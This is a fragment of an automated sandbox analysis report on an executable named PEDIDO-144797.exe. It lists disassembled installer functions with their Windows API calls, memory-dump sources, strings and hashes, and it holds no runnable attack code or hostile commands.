                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                          • String ID: F
                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                          • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                                          • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                                                          • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                                          • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                                                          Function 00405FFC Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406197,?,?), ref: 00406037
                                                                                                                                          • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406040
                                                                                                                                            • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                                                                                                            • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                                                                                                          • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 0040605D
                                                                                                                                          • wsprintfA.USER32 ref: 0040607B
                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060B6
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060C5
                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FD
                                                                                                                                          • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 00406153
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406164
                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040616B
                                                                                                                                            • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\PEDIDO-144797.exe,80000000,00000003), ref: 00405EA6
                                                                                                                                            • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                          • String ID: %ls=%ls$[Rename]
                                                                                                                                          • API String ID: 2171350718-461813615
                                                                                                                                          • Opcode ID: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                                                                                                          • Instruction ID: 7a97944e4ecdd21f919348e7cfc29446421eaa6be6f71a8f5a2bdcac5b6ce208
                                                                                                                                          • Opcode Fuzzy Hash: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                                                                                                          • Instruction Fuzzy Hash: 953139703007157BC2206B259D49F673A6CEF45714F15003AFA42FA2D2DE7C992586AD
                                                                                                                                          Function 00406644 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PEDIDO-144797.exe",00403464,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                                                                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PEDIDO-144797.exe",00403464,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                                                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PEDIDO-144797.exe",00403464,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                          • String ID: "C:\Users\user\Desktop\PEDIDO-144797.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                          • API String ID: 589700163-3933841003
                                                                                                                                          • Opcode ID: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                                                                                                          • Instruction ID: 91382b34e261ab6a6b837a41ec70345278d3faa82d58aea2d88f3062b19e38b1
                                                                                                                                          • Opcode Fuzzy Hash: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                                                                                                          • Instruction Fuzzy Hash: 8C11E61580070295DB302B149C40E7766B8EF587A4F12483FED86B32C0E77E4CD286AD
                                                                                                                                          Function 004043AC Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004043C9
                                                                                                                                          • GetSysColor.USER32(00000000), ref: 004043E5
                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004043F1
                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 004043FD
                                                                                                                                          • GetSysColor.USER32(?), ref: 00404410
                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00404420
                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040443A
                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404444
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                          • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                                                                          • Instruction ID: 701ae6dfa2b2a9365c03cf2c9b1b76f0db24f0feb35c46e7544c905291b2d973
                                                                                                                                          • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                                                                          • Instruction Fuzzy Hash: 4B216671500704AFCB219F68DE48B5BBBF8AF81714F04893EED95E22A1D774E944CB54
                                                                                                                                          Function 00405414 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                          • lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                          • lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                          • SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2531174081-0
                                                                                                                                          • Opcode ID: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                                                                                                          • Instruction ID: b4c9d1203d7b93b364d12d55a96473d81469f1a16e33619bfa53f57c996d0385
                                                                                                                                          • Opcode Fuzzy Hash: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                                                                                                          • Instruction Fuzzy Hash: 0E219071900518BACF119FA5DD85ADFBFB4EF45364F10803AF904B62A0C3794A90CFA8
                                                                                                                                          Function 00402E72 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402E8D
                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EAB
                                                                                                                                          • wsprintfW.USER32 ref: 00402ED9
                                                                                                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                            • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                            • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EFD
                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402F0B
                                                                                                                                            • Part of subcall function 00402E56: MulDiv.KERNEL32(00000000,00000064,000600F3), ref: 00402E6B
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                          • String ID: ... %d%%
                                                                                                                                          • API String ID: 722711167-2449383134
                                                                                                                                          • Opcode ID: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
                                                                                                                                          • Instruction ID: c2ec4548d439a14d597b05689786213ff5532ac021c242b5895b0761ec4a5705
                                                                                                                                          • Opcode Fuzzy Hash: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
                                                                                                                                          • Instruction Fuzzy Hash: 0501C430440724EBCB31AB60EF4CB9B7B68AB00B44B50417FF945F12E0CAB844558BEE
                                                                                                                                          Function 00404CDE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404CF9
                                                                                                                                          • GetMessagePos.USER32 ref: 00404D01
                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404D1B
                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D2D
                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D53
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                          • String ID: f
                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                          • Instruction ID: b067d4b0ecc7c77c1c3f0caef97ada8ed48413e9bef28a1d47140c0a876cf8aa
                                                                                                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                          • Instruction Fuzzy Hash: AD015E71A0021DBADB00DB94DD85BFEBBBCAF95715F10412BBA50B62D0C7B899018BA4
                                                                                                                                          Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetDC.USER32(?), ref: 00401DB6
                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                                                                                          • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                          • String ID: Tahoma
                                                                                                                                          • API String ID: 3808545654-3580928618
                                                                                                                                          • Opcode ID: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
                                                                                                                                          • Instruction ID: c2f05a2c3ba2ec5405c4fe8fe652dd8f1d703414ee124caa90b8b383e79e86eb
                                                                                                                                          • Opcode Fuzzy Hash: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
                                                                                                                                          • Instruction Fuzzy Hash: 3201B171904241EFE7006BB0AF4AB9A7FB0BF55301F10493EF242B71E2CAB800469B2D
                                                                                                                                          Function 00402DD7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                                                                                          • wsprintfW.USER32 ref: 00402E29
                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402E39
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E4B
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                                                          • Opcode ID: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                                                                                                          • Instruction ID: 0bc749b122006b2f9f6abad3e9991ed6065550717762caf8ffdc158a825a6066
                                                                                                                                          • Opcode Fuzzy Hash: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                                                                                                          • Instruction Fuzzy Hash: 69F0367154020DABDF206F50DD4ABEA3B69FB00714F00803AFA06B51D0DBFD55598F99
                                                                                                                                          Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 1000256D
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                          • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                                          • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                                                                                                          • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                                          • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                                                                                                          Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00402950
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
